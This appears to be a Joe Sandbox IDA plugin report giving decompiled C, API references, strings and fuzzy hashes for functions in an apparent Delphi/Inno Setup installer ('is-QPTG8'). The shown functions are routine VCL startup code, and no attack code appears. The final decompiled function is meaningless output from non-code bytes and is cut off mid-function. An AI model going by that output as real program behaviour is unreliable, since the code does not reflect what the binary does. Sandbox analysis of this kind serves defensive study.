Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$D747180DirectoryWindows
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 1763352164-615399546
Opcode ID: bdcaeb43fe50853d140617a0faced9bb588975b5fc51db7af6fc085389a60359
Instruction ID: 67bb17e0ff672cb8c985fb591801aee914a4b0578bbf541a6c7576e8707b291e
Opcode Fuzzy Hash: bdcaeb43fe50853d140617a0faced9bb588975b5fc51db7af6fc085389a60359
Instruction Fuzzy Hash: 1A516470A00309BBDB11EF95C841B9EBBB8EF49746F50406BFC04A7282D67C9B49CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042FF2C() {
				char _v4;
				long _v8;
				char _v12;
				char _v16;
				char _v48;
				char _t9;
				short _t13;

				 *0x48d670 = RegisterClipboardFormatA("commdlg_help");
				 *0x48d674 = RegisterClipboardFormatA("commdlg_FindReplace");
				_t9 =  *0x48d014; // 0x400000
				_v16 = _t9;
				_v12 = 0;
				_v8 = GetCurrentThreadId();
				_v4 = 0;
				_t13 = GlobalAddAtomA(E00407AD4( &_v48,  &_v16, "WndProcPtr%.8X%.8X", 1)); // executed
				 *0x48c7d8 = _t13;
				return _t13;
			}

0x0042ff39
0x0042ff48
0x0042ff4f
0x0042ff54
0x0042ff58
0x0042ff62
0x0042ff66
0x0042ff7e
0x0042ff83
0x0042ff8c

APIs

RegisterClipboardFormatA.USER32 ref: 0042FF34
RegisterClipboardFormatA.USER32 ref: 0042FF43
GetCurrentThreadId.KERNEL32 ref: 0042FF5D
GlobalAddAtomA.KERNEL32 ref: 0042FF7E

Strings

commdlg_help, xrefs: 0042FF2F
commdlg_FindReplace, xrefs: 0042FF3E
WndProcPtr%.8X%.8X, xrefs: 0042FF6F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: f6a6435b8824f9f5950342d67b03ca63d6a2520d355a04a0db96b138db2c478a
Instruction ID: d604335079d6820e711b39dc432d8208c41b19cec52ad835c2345196bbc2d67a
Opcode Fuzzy Hash: f6a6435b8824f9f5950342d67b03ca63d6a2520d355a04a0db96b138db2c478a
Instruction Fuzzy Hash: C8F082B0A083449AD300EB75D94270D77E0AB49708F800A7FF458A66D1E77895048B2F

Uniqueness

Uniqueness Score: -1.00%

Function 004238A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E004238A4(void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v261;
				void* __esi;
				void* __ebp;
				int _t29;
				struct HINSTANCE__* _t40;
				struct HICON__* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t46;
				void* _t52;
				char* _t54;
				int _t65;
				void* _t66;
				char _t68;
				void* _t78;
				void* _t80;
				void* _t81;

				_t78 = __edi;
				_t68 = __edx;
				_t66 = __ecx;
				if(__edx != 0) {
					_t81 = _t81 + 0xfffffff0;
					_t29 = E00402E78(_t29, _t80);
				}
				_v5 = _t68;
				_t65 = _t29;
				E00410438(_t66, 0);
				 *((intOrPtr*)(_t65 + 0x70)) = E00402C78(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E00402C78(1);
				 *((intOrPtr*)(_t65 + 0x40)) = 0;
				 *((intOrPtr*)(_t65 + 0x60)) = 0;
				 *((intOrPtr*)(_t65 + 0x3c)) = 0x80000018;
				 *((intOrPtr*)(_t65 + 0x54)) = 0x1f4;
				 *((intOrPtr*)(_t65 + 0x58)) = 0x32;
				 *((intOrPtr*)(_t65 + 0x5c)) = 0x9c4;
				 *((char*)(_t65 + 0x64)) = 0;
				 *((char*)(_t65 + 0x7d)) = 1;
				_t79 = E0041DC2C(1);
				 *((intOrPtr*)(_t65 + 0x78)) = _t39;
				_t40 =  *0x48d014; // 0x400000
				_t41 = LoadIconA(_t40, "MAINICON"); // executed
				E0041DFB8(_t79, _t41);
				_t13 = _t65 + 0x78; // 0xc23bc88b
				_t44 =  *_t13;
				 *((intOrPtr*)(_t44 + 8)) = _t65;
				 *((intOrPtr*)(_t44 + 4)) = 0x424cbc;
				_t46 =  *0x48d014; // 0x400000
				GetModuleFileNameA(_t46,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t52 = E004076D4( &_v261, 0x5c);
				if(_t52 != 0) {
					_t20 = _t52 + 1; // 0x1
					E0040753C( &_v261, _t20);
				}
				_t54 = E004076B4( &_v261, 0x2e);
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t24 = _t65 + 0x6c; // 0x41f028
				E004036A4(_t24, 0x100,  &_v261);
				if( *0x48d034 == 0) {
					E00423A8C(_t65, _t78, _t79);
				}
				 *((char*)(_t65 + 0x39)) = 1;
				 *((char*)(_t65 + 0x3a)) = 1;
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x004238a4
0x004238a4
0x004238a4
0x004238b1
0x004238b3
0x004238b6
0x004238b6
0x004238bb
0x004238be
0x004238c4
0x004238d5
0x004238e4
0x004238ec
0x004238f1
0x004238f4
0x004238fb
0x00423902
0x00423909
0x00423910
0x00423914
0x00423924
0x00423926
0x0042392e
0x00423934
0x0042393d
0x00423942
0x00423942
0x00423945
0x00423948
0x0042395b
0x00423961
0x00423974
0x00423981
0x00423988
0x0042398a
0x00423993
0x00423993
0x004239a0
0x004239a7
0x004239a9
0x004239a9
0x004239b4
0x004239b9
0x004239c7
0x004239d3
0x004239d7
0x004239d7
0x004239dc
0x004239e0
0x004239e8
0x004239ea
0x004239f1
0x004239fb

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00423934
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004191FE,00000000,?,?,00000001,00000000), ref: 00423961
OemToCharA.USER32(?,?), ref: 00423974
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,004191FE,00000000,?,?,00000001,00000000), ref: 004239B4

Strings

MAINICON, xrefs: 00423929
2, xrefs: 00423902

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: a1b2aa8e1b0dc63d19649394c6a145090a8d81da0ad4639ff0fffce70a1114d9
Instruction ID: 4c120462c0f7cfe15a9905d7693c07d2c429d5146352deee2b236b386ab3a8e9
Opcode Fuzzy Hash: a1b2aa8e1b0dc63d19649394c6a145090a8d81da0ad4639ff0fffce70a1114d9
Instruction Fuzzy Hash: 2531A270A042449ADB10EF29C8857C97BA8AB15308F4445BAE844DF293D7FED988CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00419150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419150(void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v56;
				char _v60;
				short _t14;
				char _t15;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;

				_v24 = GetCurrentProcessId();
				_v20 = 0;
				_t14 = GlobalAddAtomA(E00407AD4( &_v56,  &_v24, "Delphi%.8X", 0)); // executed
				 *0x48d5c6 = _t14;
				_t15 =  *0x48d014; // 0x400000
				_v20 = _t15;
				_v16 = 0;
				_v12 = GetCurrentThreadId();
				_v8 = 0;
				 *0x48d5c8 = GlobalAddAtomA(E00407AD4( &_v60,  &_v20, "ControlOfs%.8X%.8X", 1));
				 *0x48d600 = E00402C78(1);
				_t22 =  *0x48d600; // 0x21d0638
				E0040B7D0(_t22, 4);
				_t25 = E004232E0(1); // executed
				 *0x48d62c = _t25;
				_t27 = E004238A4(0, 1, __edi); // executed
				 *0x48d628 = _t27;
				E0041F330();
				_t29 =  *0x48d628; // 0x21d2410
				E00424B18(_t29, 1);
				E00406A88(E00419120, 1);
				return E0040B1B4(0x412c38, 0x413ad8, 0x413b0c);
			}

0x0041915a
0x0041915e
0x00419176
0x0041917b
0x00419183
0x00419188
0x0041918c
0x00419196
0x0041919a
0x004191b7
0x004191c9
0x004191d3
0x004191d8
0x004191e6
0x004191eb
0x004191f9
0x004191fe
0x00419203
0x0041920a
0x0041920f
0x00419219
0x00419235

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00419155
GlobalAddAtomA.KERNEL32 ref: 00419176
GetCurrentThreadId.KERNEL32 ref: 00419191
GlobalAddAtomA.KERNEL32 ref: 004191B2

Part of subcall function 004232E0: 740BAC50.USER32(00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001,00000000), ref: 00423336
Part of subcall function 004232E0: EnumFontsA.GDI32(00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001,00000000), ref: 00423349
Part of subcall function 004232E0: 740BAD70.GDI32(00000000,0000005A,00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001), ref: 00423351
Part of subcall function 004232E0: 740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000), ref: 0042335C

Part of subcall function 004238A4: LoadIconA.USER32(00400000,MAINICON), ref: 00423934
Part of subcall function 004238A4: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004191FE,00000000,?,?,00000001,00000000), ref: 00423961
Part of subcall function 004238A4: OemToCharA.USER32(?,?), ref: 00423974
Part of subcall function 004238A4: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,004191FE,00000000,?,?,00000001,00000000), ref: 004239B4

Part of subcall function 0041F330: GetVersion.KERNEL32(?,00419208,00000000,?,?,00000001,00000000), ref: 0041F33E
Part of subcall function 0041F330: SetErrorMode.KERNEL32(00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F35A
Part of subcall function 0041F330: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F366
Part of subcall function 0041F330: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F374
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dRegister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3A4
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3CD
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3E2
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3F7
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F40C
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001), ref: 0041F421
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000), ref: 0041F436
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208), ref: 0041F44B
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F460
Part of subcall function 0041F330: 6D2B5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F475

Strings

ControlOfs%.8X%.8X, xrefs: 004191A3
Delphi%.8X, xrefs: 00419167

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$AtomCharCurrentErrorGlobalLoadMode$B380EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 989608647-2767913252
Opcode ID: e13380655b83e54431d32c3d2751868425e568a424df7e18e5881c1193dfffb5
Instruction ID: abf9e9e911ae98e12a27bc86db2dff3641ad5eb162e59bac8fe589a6aa7d8dd0
Opcode Fuzzy Hash: e13380655b83e54431d32c3d2751868425e568a424df7e18e5881c1193dfffb5
Instruction Fuzzy Hash: 5E112C70A192405AC700FF76994264E77E0AB9830CF40993FF848AB3D1EB39A945CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00413438 Relevance: 9.6, APIs: 6, Instructions: 638
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00413438(void* __eax, signed char __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, char _a1, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a64) {
				intOrPtr _v4;
				struct HWND__* _v12;
				char _v24;
				signed int _t357;
				signed int _t358;
				void* _t359;
				signed int _t360;
				signed int _t364;
				struct HWND__* _t365;
				void* _t367;
				void* _t371;
				void* _t375;
				void* _t383;
				void* _t384;
				void* _t389;
				void* _t392;
				signed int _t394;
				signed char _t395;
				void* _t396;
				signed char _t398;
				intOrPtr* _t399;
				signed char _t403;
				void* _t404;
				signed char _t405;
				signed int _t409;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				void* _t418;
				signed int _t419;
				signed int* _t420;
				signed int _t424;
				void* _t426;
				signed int _t427;
				void* _t428;
				signed int _t430;
				signed int* _t432;
				signed int _t433;
				signed int* _t434;
				signed int _t435;
				intOrPtr* _t439;
				signed int _t440;
				void* _t441;
				void* _t442;
				void* _t444;
				signed char _t445;
				signed int* _t449;
				signed int _t451;
				signed int* _t453;
				signed int* _t454;
				signed int* _t456;
				void* _t459;
				signed int* _t460;
				void* _t461;
				void* _t463;
				signed int _t464;
				void* _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				signed int _t470;
				signed int _t472;
				void* _t473;
				signed int _t474;
				signed int _t475;
				signed int _t480;
				intOrPtr _t493;
				void* _t497;
				intOrPtr _t498;
				signed int _t499;
				intOrPtr _t501;
				intOrPtr _t503;
				intOrPtr* _t504;
				void* _t515;
				intOrPtr _t516;
				intOrPtr _t517;
				signed int _t521;
				void* _t534;
				void* _t539;
				signed int _t545;
				signed int _t548;
				signed int _t550;
				void* _t556;
				void* _t558;
				signed char _t563;
				signed char _t565;
				signed int _t567;
				signed char _t580;

				_t474 = __esi;
				_t472 = __edi;
				_t470 = __edx;
				_t403 = __ebx;
				_t409 = __ecx + 1;
				_t357 = __eax + _t409;
				if(_t357 >= 0) {
					L13:
					if(_t493 > 0) {
						 *(_t470 + 0x41) =  *(_t470 + 0x41) - _t403;
					} else {
						 *((intOrPtr*)(_t357 + 0x24004177)) =  *((intOrPtr*)(_t357 + 0x24004177)) + _t470;
						goto L15;
					}
				} else {
					 *_t357 =  *_t357 + __edx;
					if( *_t357 < 0) {
						L15:
						_t357 = 0x77;
						_t468 = _t409 + 1;
					} else {
						 *((intOrPtr*)(_t357 + 0x72)) =  *((intOrPtr*)(_t357 + 0x72)) + _t357;
						_t464 = _t409 + 1;
						_t3 = _t357 - 0x5fffbe8e;
						 *_t3 =  *((intOrPtr*)(_t357 - 0x5fffbe8e)) + _t357;
						if( *_t3 < 0) {
							if(_t497 < 0) {
								_t467 = _t464 + 1;
							} else {
								_t409 = _t464 + 1;
								_t35 = _t357 - 0x33ffbe88;
								 *_t35 =  *((intOrPtr*)(_t357 - 0x33ffbe88)) + _t403;
								_t498 =  *_t35;
								goto L20;
							}
						} else {
							_t357 = _t357 + _t357;
							if(_t357 < 0) {
								L20:
								_t358 = _t357;
								if(_t498 < 0) {
									if(_t515 != 0) {
										_t480 = _t480 + 1;
										if(_t534 < 0) {
											goto L91;
										} else {
											 *_t358 =  *_t358 + _t358;
											goto L74;
										}
									} else {
										_t66 = _t403 + 0x7a580041 + _t472 * 2;
										 *_t66 =  *((intOrPtr*)(_t403 + 0x7a580041 + _t472 * 2)) + _t358;
										_t516 =  *_t66;
										goto L47;
									}
								} else {
									_t358 = _t358 + _t409;
									_t499 = _t358;
									goto L22;
								}
							} else {
								_t358 = _t357 + _t464;
								if(_t358 < 0) {
									L22:
									asm("int3");
									if(_t499 < 0) {
										L47:
										asm("movsb");
										if(_t516 != 0) {
											L74:
											 *((intOrPtr*)(_t358 + 0x75140041)) =  *((intOrPtr*)(_t358 + 0x75140041)) + _t358;
											goto L75;
										} else {
											_t72 = _t358 + 0x7a;
											 *_t72 =  *((intOrPtr*)(_t358 + 0x7a)) + _t403;
											_t517 =  *_t72;
											goto L49;
										}
									} else {
										_t358 = _t358 + _t409;
										if(_t358 < 0) {
											L49:
											_pop(_t358);
											if(_t517 != 0) {
												L75:
												asm("adc al, 0x75");
												_t409 = _t409 + 1;
											} else {
												 *((intOrPtr*)(_t409 + 0x79c40041 + _t472 * 2)) =  *((intOrPtr*)(_t409 + 0x79c40041 + _t472 * 2)) + _t409;
												goto L51;
											}
										} else {
											_t37 = _t358 + 0x79;
											 *_t37 =  *((intOrPtr*)(_t358 + 0x79)) + _t409;
											_t501 =  *_t37;
											goto L25;
										}
									}
								} else {
									 *((intOrPtr*)(__ebx + __esi * 2)) =  *((intOrPtr*)(__ebx + __esi * 2)) + _t464;
									_t409 = _t464 + 1;
									 *_t358 =  *_t358 + __edx;
									if( *_t358 >= 0) {
										L25:
										_push(0x8c004179);
										if(_t501 >= 0) {
											L51:
											asm("les edi, [ecx+0x41]");
											_t360 = _t358 + _t470;
											if(_t360 >= 0) {
												_t480 = _t480 - 1;
												if(_t539 != 0) {
													goto L95;
												} else {
													 *((intOrPtr*)(_t358 + 0x76)) =  *((intOrPtr*)(_t358 + 0x76)) + _t409;
													goto L80;
												}
											} else {
												_t358 = _t360 + _t403;
												if(_t358 >= 0) {
													L80:
													_t360 = _t358 - 1;
													if(_t360 <= 0) {
														goto L97;
													} else {
														 *((intOrPtr*)(_t472 + _t474 * 2)) =  *((intOrPtr*)(_t472 + _t474 * 2)) + _t470;
														goto L82;
													}
												} else {
													_t360 = _t358 + _t409;
													_t521 = _t360;
													goto L54;
												}
											}
										} else {
											 *((intOrPtr*)(_t470 + _t474 * 2)) =  *((intOrPtr*)(_t470 + _t474 * 2)) + _t409;
											goto L27;
										}
									} else {
										 *((intOrPtr*)(__ebx + 0x41 + __esi * 2)) =  *((intOrPtr*)(__ebx + 0x41 + __esi * 2)) + _t409;
										_t358 = _t358 + __ebx;
										if(_t358 >= 0) {
											L27:
											_t360 = _t358 - 0x72;
											 *((intOrPtr*)(_t360 + 0x72)) =  *((intOrPtr*)(_t360 + 0x72)) + _t360;
											_t409 = _t409 + 2;
											_t45 = _t360 + 0x72;
											 *_t45 =  *((intOrPtr*)(_t360 + 0x72)) + _t470;
											_t503 =  *_t45;
											goto L28;
										} else {
											 *((intOrPtr*)(_t480 + __esi * 2)) =  *((intOrPtr*)(_t480 + __esi * 2)) + __ebx;
											_t409 = _t409 + 1;
											 *_t358 =  *_t358 + __edx;
											if( *_t358 == 0) {
												L28:
												_push(_t360);
												if(_t503 < 0) {
													L54:
													asm("int3");
													if(_t521 != 0) {
														L82:
														asm("adc al, 0x77");
														_t465 = _t409 + 1;
														 *((intOrPtr*)(_t465 + _t472 * 2)) =  *((intOrPtr*)(_t465 + _t472 * 2)) + _t465;
														_t398 = _t360 | 0x00000079;
														_t464 = _t465 + 1;
														 *((intOrPtr*)(_t398 + 0x41 + _t464 * 4)) =  *((intOrPtr*)(_t398 + 0x41 + _t464 * 4)) + _t398;
														 *[fs:ecx] = _t398;
														_t124 = _t470 - 0x79b3ffbf;
														 *_t124 =  *(_t470 - 0x79b3ffbf) & _t398;
														_t545 =  *_t124;
														_t480 = _t480 - 1;
														_t360 =  *_t464;
														 *_t464 = _t398;
														_t470 = _t470 |  *(_t472 + 0x69 + _t470 * 2);
														asm("outsb");
														_t403 = _t403 + 1;
														asm("outsd");
														asm("outsb");
														if(_t545 == 0) {
															L103:
															_t409 = _t464 + 1;
															 *_t360 =  *_t360 + _t409;
															_t396 = _t360 - 0x40;
															 *((intOrPtr*)(_t396 + 0x2c)) =  *((intOrPtr*)(_t396 + 0x2c)) + _t470;
															_t358 = _t396 + 1 + _t403;
															 *_t409 = _t358;
															asm("enter 0x40ba, 0x0");
															goto L104;
														} else {
															asm("outsd");
															asm("insb");
															_pop(es);
															_t470 = _t470 |  *(_t472 + 0x69 + _t470 * 2);
															asm("outsb");
															L91:
															_t403 = _t403 + 1;
															asm("outsd");
															asm("outsb");
															if(_t403 == 0) {
																L104:
																_t470 = 0x55fc0040;
																_t359 = _t358 + _t358;
																goto L105;
															} else {
																asm("outsd");
																asm("insb");
																 *_t403 =  *_t403 - _t470;
																_t395 = _t358 ^  *_t409;
																asm("adc al, 0x32");
																_t360 = _t395 ^  *_t409;
																 *_t360 =  *_t360 | _t360;
																_t133 = _t403 + 0x6f;
																 *_t133 =  *(_t403 + 0x6f) | _t360;
																_t548 =  *_t133;
																L95:
																asm("outsb");
																if(_t548 == 0) {
																	L106:
																	 *((intOrPtr*)(_t360 + 0x2c004146)) =  *((intOrPtr*)(_t360 + 0x2c004146)) + _t409;
																	_t404 = _t403 - 1;
																	 *((intOrPtr*)(_t360 + 8)) =  *((intOrPtr*)(_t360 + 8)) + _t470;
																	_t414 = _t409 + 2;
																	 *((intOrPtr*)(_t360 + 8)) =  *((intOrPtr*)(_t360 + 8)) + _t414;
																	_t415 = _t414 + 1;
																	 *((intOrPtr*)(_t360 + 0x49580041 + _t415 * 4)) =  *((intOrPtr*)(_t360 + 0x49580041 + _t415 * 4)) + _t360;
																	_t416 = _t415 + 1;
																	 *((intOrPtr*)(_t360 + 0x4fa80041 + _t416 * 2)) =  *((intOrPtr*)(_t360 + 0x4fa80041 + _t416 * 2)) + _t404;
																	goto L107;
																} else {
																	asm("outsd");
																	L97:
																	asm("insb");
																	if(_t548 < 0) {
																		 *((intOrPtr*)(_t403 + 0x40)) =  *((intOrPtr*)(_t403 + 0x40)) + _t470;
																	}
																	_push(_t480);
																	 *0xd00040 = _t360;
																	asm("rol byte [eax], 1");
																	_t403 = _t403 + _t403 + _t403 + _t403;
																	 *_t360 =  *_t360 + _t360;
																	 *_t360 =  *_t360 + _t360;
																	 *_t360 =  *_t360 + _t360;
																	 *_t360 =  *_t360 + _t360;
																	 *_t360 =  *_t360 | _t360;
																	_t416 = _t409 |  *(_t360 + 0x65);
																	_t550 = _t416;
																	asm("insb");
																	if(_t550 < 0) {
																		L105:
																		_t360 = _t359 + _t403;
																		_t474 = _t474 + 1;
																		_t409 = 0x8540042;
																		goto L106;
																	} else {
																		asm("outsd");
																		asm("outsb");
																		if(_t550 == 0) {
																			L107:
																			 *((intOrPtr*)(_t360 - 0x3fffbeb1)) =  *((intOrPtr*)(_t360 - 0x3fffbeb1)) + _t416;
																			_t475 =  &_a1;
																			_t417 = _t416 + 1;
																			 *((intOrPtr*)(_t474 + 0x41 + _t360 * 2)) =  *((intOrPtr*)(_t474 + 0x41 + _t360 * 2)) + _t470;
																			 *((intOrPtr*)(_t480 + _t417 * 2)) =  *((intOrPtr*)(_t480 + _t417 * 2)) + _t470;
																			_t418 = _t417 + 1;
																			 *((intOrPtr*)(_t360 + 0x20004154)) =  *((intOrPtr*)(_t360 + 0x20004154)) + _t418;
																		} else {
																			if(_t550 >= 0) {
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				_t480 = _t480 + 1;
																				_t461 = _t416 + 1;
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				 *_t360 =  *_t360 + _t360;
																				 *((intOrPtr*)(_t474 + _t474)) =  *((intOrPtr*)(_t474 + _t474)) + _t461;
																				 *((intOrPtr*)(_t474 + _t474)) =  *((intOrPtr*)(_t474 + _t474)) + _t470;
																				_t463 = _t461 + 2;
																				 *((intOrPtr*)(_t360 + _t360 + 0x30a40000)) =  *((intOrPtr*)(_t360 + _t360 + 0x30a40000)) + _t463;
																				_t464 = _t463 + 1;
																				 *((intOrPtr*)(0x2c280041 + _t470 * 2)) =  *((intOrPtr*)(0x2c280041 + _t470 * 2)) + _t470;
																				goto L103;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t399 = _t360 + _t470;
														goto L56;
													}
												} else {
													_t399 = _t360 + _t403;
													_t504 = _t399;
													goto L30;
												}
											} else {
												 *_t358 =  *_t358 + _t409;
												if( *_t358 <= 0) {
													L30:
													asm("cld");
													if(_t504 >= 0) {
														L56:
														asm("aam 0x7b");
														_t466 = _t409 + 1;
													} else {
														 *_t399 =  *_t399 + _t470;
														goto L32;
													}
												} else {
													 *_t358 =  *_t358 + _t409;
													if( *_t358 <= 0) {
														L32:
														asm("adc [edx+0x41], bh");
													} else {
														_t399 = _t358 + __edx;
														if(_t399 <= 0) {
															asm("sbb [edx+0x41], bh");
														} else {
															_t399 = _t399 + __edx;
															if(_t399 <= 0) {
																 *(_t470 + 0x41) =  *(_t470 + 0x41) & _t403;
															} else {
																_t19 = _t399 - 0x4fffbe89;
																 *_t19 =  *((intOrPtr*)(_t399 - 0x4fffbe89)) + __edx;
																_t493 =  *_t19;
																goto L13;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *(_t418 + _t360 * 2) = _t470;
				 *(_t418 + 0x41) =  *(_t418 + 0x41) & _t470;
				 *((intOrPtr*)(_t418 + 0x41 + _t470 * 2)) =  *((intOrPtr*)(_t418 + 0x41 + _t470 * 2)) + _t404;
				 *((intOrPtr*)(_t360 + 0x60004147)) =  *((intOrPtr*)(_t360 + 0x60004147)) + _t418;
				_push(_t418);
				_t419 = _t418 + 1;
				 *((intOrPtr*)(_t360 + 0x1004189)) =  *((intOrPtr*)(_t360 + 0x1004189)) + _t360;
				 *_t472 =  *_t472 + _t419;
				 *((intOrPtr*)(_t419 + _t419 * 4)) =  *((intOrPtr*)(_t419 + _t419 * 4)) + _t360;
				_t420 = _t419 + 1;
				 *_t472 =  *_t472 + _t420;
				_push(_t480);
				_t473 = _t472 + 1;
				_t556 = _t473;
				if(_t556 < 0) {
